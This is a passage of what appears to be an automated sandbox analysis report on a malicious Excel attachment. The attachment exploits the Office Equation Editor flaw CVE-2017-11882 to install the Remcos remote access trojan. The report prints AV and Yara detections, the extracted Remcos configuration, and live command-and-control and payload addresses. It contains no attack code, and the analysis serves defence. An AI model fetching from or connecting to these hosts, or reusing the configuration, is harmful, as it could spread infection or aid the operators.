                Severity:1
                Source Port:49174
                Destination Port:14645
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-28T06:54:16.039220+0200
                SID:2803304
                Severity:3
                Source Port:49175
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic


                AV Detection

                Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg, URL Reputation: Label: malware
                Source: 2024remcmon.duckdns.org, Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: 2024remcmon.duckdns.org, Virustotal: Detection: 15%
                Source: http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc, Virustotal: Detection: 6%
                Source: 2024remcmon.duckdns.org, Virustotal: Detection: 15%
                Source: RFQ No. 109078906v.xla.xlsx, Virustotal: Detection: 21%
                Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: RFQ No. 109078906v.xla.xlsx, Joe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 14_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_00433837
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_6c6043c1-a

                Exploits

                Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 107.172.31.21 Port: 80
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
                Source: ~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp.4.drStream path '_1786311594/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp.4.drStream path '_1786311600/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 14_2_004074FD _wcslen,CoGetObject,14_2_004074FD
                Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknown, HTTPS traffic detected: 192.168.2.22:49165 -> 88.99.66.38:443 version: TLS 1.0
                Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknown, HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
